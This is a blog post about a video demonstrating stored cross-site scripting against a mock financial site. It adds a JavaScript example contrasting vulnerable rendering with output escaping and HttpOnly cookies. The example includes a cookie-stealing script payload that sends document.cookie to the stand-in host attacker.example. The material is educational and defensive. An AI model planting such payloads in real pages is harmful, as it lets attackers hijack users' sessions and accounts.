Persistent Cross-Site Scripting (XSS) Demo

If you have ever wanted to see how cross-site scripting works in practice, look no further than this video, created by Aleksander Gorkowienko, a database and application security expert with the company 7Safe.

In “Cross-Site Scripting Explained”, Aleksander simulates a persistent (stored) XSS attack against a fictitious online financial company. He demonstrates how an attacker can move from one authenticated user's session to another's by stealing the PHP session cookie: once the cookie is in hand, the password and PIN that protect the login are no longer needed.

In the attack, Aleksander uses the Browser Exploitation Framework (BeEF), JavaScript and the web application security testing platform Burp Suite. I haven’t played with BeEF in a while, so it was good to see it in action again.
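To make the mechanics concrete, here is an added example, written for this post and not taken from the video or from BeEF, of the pattern Aleksander demonstrates: a message board that stores user input and replays it to later visitors, a cookie-stealing payload of the kind a BeEF hook plants, and the two fixes on the application side (output encoding and an HttpOnly session cookie). The attacker host attacker.example, the session id value and the rendering functions are assumptions made for illustration; PHPSESSID is simply PHP's default session cookie name.

```javascript
// Added example, not code from the video or from BeEF: a minimal model of the
// persistent-XSS session hijack in the demo, next to the fixes. All names and
// values (attacker.example, the session id "s3ss10n") are constructed.

// The message board stores whatever is posted and replays it to every later
// visitor; that replay is what makes the XSS persistent.
const storedMessages = [];

function postMessage(text) {
  storedMessages.push(text);
}

// Vulnerable rendering: user input is concatenated straight into the HTML.
function renderMessagesVulnerable() {
  return storedMessages.map((m) => `<li>${m}</li>`).join("\n");
}

// Fix 1: encode the HTML metacharacters on output so a stored "<script>"
// becomes inert text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderMessagesSafe() {
  return storedMessages.map((m) => `<li>${escapeHtml(m)}</li>`).join("\n");
}

// The kind of payload a BeEF hook or a hand-written script plants: it ships
// the victim's cookies to a host the attacker controls.
const cookieStealer =
  '<script>new Image().src="http://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Crude browser model: does the served page contain a script element that
// the browser would execute?
function pageExecutesScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

// Fix 2 (server side): flag the session cookie HttpOnly so document.cookie
// never exposes it. PHPSESSID is PHP's default session cookie name. A script
// that still runs can act as the user from inside the page, so this narrows
// the damage rather than removing the XSS.
function sessionCookieHeader(sessionId, { httpOnly = true, secure = true } = {}) {
  const attrs = ["Path=/", "SameSite=Lax"];
  if (secure) attrs.push("Secure");
  if (httpOnly) attrs.push("HttpOnly");
  return `PHPSESSID=${sessionId}; ${attrs.join("; ")}`;
}

// Model of what document.cookie returns given the Set-Cookie headers the
// server sent: HttpOnly cookies are never visible to script.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(";")[0])
    .join("; ");
}

// The scenario from the demo: a legitimate post, then the attacker's post.
postMessage("Hello from a normal user");
postMessage(cookieStealer);

console.log("vulnerable page runs the payload:",
  pageExecutesScript(renderMessagesVulnerable()));            // true
console.log("escaped page runs the payload:",
  pageExecutesScript(renderMessagesSafe()));                  // false
console.log("cookie visible to script (no HttpOnly):",
  scriptVisibleCookies([sessionCookieHeader("s3ss10n", { httpOnly: false })]));
console.log("cookie visible to script (HttpOnly):",
  JSON.stringify(scriptVisibleCookies([sessionCookieHeader("s3ss10n")])));
```

Run it with node and compare the two renderings: the vulnerable page hands the attacker every visitor's cookie string, the escaped page shows the payload as harmless text, and with HttpOnly set the session id is not in document.cookie even on the vulnerable page. Output encoding is the actual fix; HttpOnly is defence in depth, because a script that runs in the victim's page can still issue requests as that user without ever reading the cookie.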

The video demonstrates why it is important to test web applications for vulnerabilities like XSS. It is definitely a must-see!

For more information, check out Aleksander’s website IT Security Lab.

~ by D. Dieterle on October 30, 2010.
